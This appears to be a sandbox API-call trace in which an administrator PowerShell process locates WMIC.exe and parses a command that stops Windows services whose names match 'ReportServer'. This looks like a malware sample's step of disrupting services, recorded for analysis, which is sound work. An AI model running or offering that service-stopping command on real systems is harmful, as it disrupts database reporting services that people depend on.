[0244.856] SetErrorMode (uMode=0x1) returned 0x1 [0244.856] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.857] SetErrorMode (uMode=0x1) returned 0x1 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.857] SetErrorMode (uMode=0x1) returned 0x1 [0244.857] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.858] SetErrorMode (uMode=0x1) returned 0x1 [0244.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.858] SetErrorMode (uMode=0x1) returned 0x1 [0244.858] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.858] SetErrorMode (uMode=0x1) returned 0x1 [0244.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.859] SetErrorMode (uMode=0x1) returned 0x1 [0244.859] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.859] SetErrorMode (uMode=0x1) returned 0x1 [0244.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.860] SetErrorMode (uMode=0x1) returned 0x1 [0244.860] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.860] SetErrorMode (uMode=0x1) returned 0x1 [0244.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.860] SetErrorMode (uMode=0x1) returned 0x1 [0244.861] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.861] SetErrorMode (uMode=0x1) returned 0x1 [0244.861] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.861] SetErrorMode (uMode=0x1) returned 0x1 [0244.861] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.862] SetErrorMode (uMode=0x1) returned 0x1 [0244.862] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.862] SetErrorMode (uMode=0x1) returned 0x1 [0244.862] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.862] SetErrorMode (uMode=0x1) returned 0x1 [0244.862] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.863] SetErrorMode (uMode=0x1) returned 0x1 [0244.863] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.863] SetErrorMode (uMode=0x1) returned 0x1 [0244.863] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.863] SetErrorMode (uMode=0x1) returned 0x1 [0244.863] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.864] SetErrorMode (uMode=0x1) returned 0x1 [0244.864] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.864] SetErrorMode (uMode=0x1) returned 0x1 [0244.864] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.864] SetErrorMode (uMode=0x1) returned 0x1 [0244.865] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.865] SetErrorMode (uMode=0x1) returned 0x1 [0244.865] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.865] SetErrorMode (uMode=0x1) returned 0x1 [0244.865] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.866] SetErrorMode (uMode=0x1) returned 0x1 [0244.866] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.866] SetErrorMode (uMode=0x1) returned 0x1 [0244.866] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.866] SetErrorMode (uMode=0x1) returned 0x1 [0244.866] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.867] SetErrorMode (uMode=0x1) returned 0x1 [0244.867] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.867] SetErrorMode (uMode=0x1) returned 0x1 [0244.867] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.868] SetErrorMode (uMode=0x1) returned 0x1 [0244.868] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.868] SetErrorMode (uMode=0x1) returned 0x1 [0244.868] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.868] SetErrorMode (uMode=0x1) returned 0x1 [0244.869] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.869] SetErrorMode (uMode=0x1) returned 0x1 [0244.869] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.869] SetErrorMode (uMode=0x1) returned 0x1 [0244.869] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.870] SetErrorMode (uMode=0x1) returned 0x1 [0244.870] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.870] SetErrorMode (uMode=0x1) returned 0x1 [0244.870] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.870] SetErrorMode (uMode=0x1) returned 0x1 [0244.870] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.871] SetErrorMode (uMode=0x1) returned 0x1 [0244.871] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.871] SetErrorMode (uMode=0x1) returned 0x1 [0244.871] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.871] SetErrorMode (uMode=0x1) returned 0x1 [0244.871] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0244.872] SetErrorMode (uMode=0x1) returned 0x1 [0244.872] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.872] SetErrorMode (uMode=0x1) returned 0x1 [0244.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0244.872] SetErrorMode (uMode=0x1) returned 0x1 [0244.872] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.873] SetErrorMode (uMode=0x1) returned 0x1 [0244.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0244.873] SetErrorMode (uMode=0x1) returned 0x1 [0244.873] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.873] SetErrorMode (uMode=0x1) returned 0x1 [0244.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0244.874] SetErrorMode (uMode=0x1) returned 0x1 [0244.874] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.874] SetErrorMode (uMode=0x1) returned 0x1 [0244.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0244.874] SetErrorMode (uMode=0x1) returned 0x1 [0244.874] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.875] SetErrorMode (uMode=0x1) returned 0x1 [0244.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0244.875] SetErrorMode (uMode=0x1) returned 0x1 [0244.875] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0244.875] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c82db50 | out: lpFindFileData=0x1c82db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0244.875] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0244.875] SetErrorMode (uMode=0x1) returned 0x1 [0244.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c82dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0244.876] SetErrorMode (uMode=0x1) returned 0x1 [0244.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c82de70 | out: lpFileInformation=0x1c82de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0244.876] SetErrorMode (uMode=0x1) returned 0x1 [0244.876] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0244.876] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c82e058, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e058) returned 0x4550 [0244.877] CoTaskMemFree (pv=0x1b9b1010) [0244.877] GetConsoleWindow () returned 0x5011e [0244.878] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0244.878] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0244.878] CoTaskMemFree (pv=0x2af7b0) [0244.879] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0244.879] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0244.879] CoTaskMemFree (pv=0x2af7b0) [0244.879] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", pNumArgs=0x1c82e0a0 | out: pNumArgs=0x1c82e0a0) returned 0x28a430*="" [0244.879] lstrlenW (lpString="path") returned 4 [0244.879] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc750 [0244.879] RtlMoveMemory (in: Destination=0x1b9cc750, Source=0x28a472, Length=0xa | out: Destination=0x1b9cc750) [0244.879] CoTaskMemFree (pv=0x1b9cc750) [0244.879] lstrlenW (lpString="Win32_Service") returned 13 [0244.879] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0244.879] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1010) [0244.879] CoTaskMemFree (pv=0x1b9b1010) [0244.879] lstrlenW (lpString="where") returned 5 [0244.879] CoTaskMemAlloc (cb=0xe) returned 0x1b9cc750 [0244.879] RtlMoveMemory (in: Destination=0x1b9cc750, Source=0x28a498, Length=0xc | out: Destination=0x1b9cc750) [0244.879] CoTaskMemFree (pv=0x1b9cc750) [0244.879] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0244.879] CoTaskMemAlloc (cb=0x3c) returned 0x1b9c8560 [0244.879] RtlMoveMemory (in: Destination=0x1b9c8560, Source=0x28a4a4, Length=0x3a | out: Destination=0x1b9c8560) [0244.879] CoTaskMemFree (pv=0x1b9c8560) [0244.879] lstrlenW (lpString="call") returned 4 [0244.880] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc750 [0244.880] RtlMoveMemory (in: Destination=0x1b9cc750, Source=0x28a4de, Length=0xa | out: Destination=0x1b9cc750) [0244.880] CoTaskMemFree (pv=0x1b9cc750) [0244.880] lstrlenW (lpString="stopservice") returned 11 [0244.880] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0244.880] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a4e8, Length=0x18 | out: Destination=0x1b9b1010) [0244.880] CoTaskMemFree (pv=0x1b9b1010) [0244.880] LocalFree (hMem=0x28a430) returned 0x0 [0244.880] CoTaskMemAlloc (cb=0x804) returned 0x1b9dd4f0 [0244.880] GetConsoleTitleW (in: lpConsoleTitle=0x1b9dd4f0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0244.881] CoTaskMemFree (pv=0x1b9dd4f0) [0244.881] 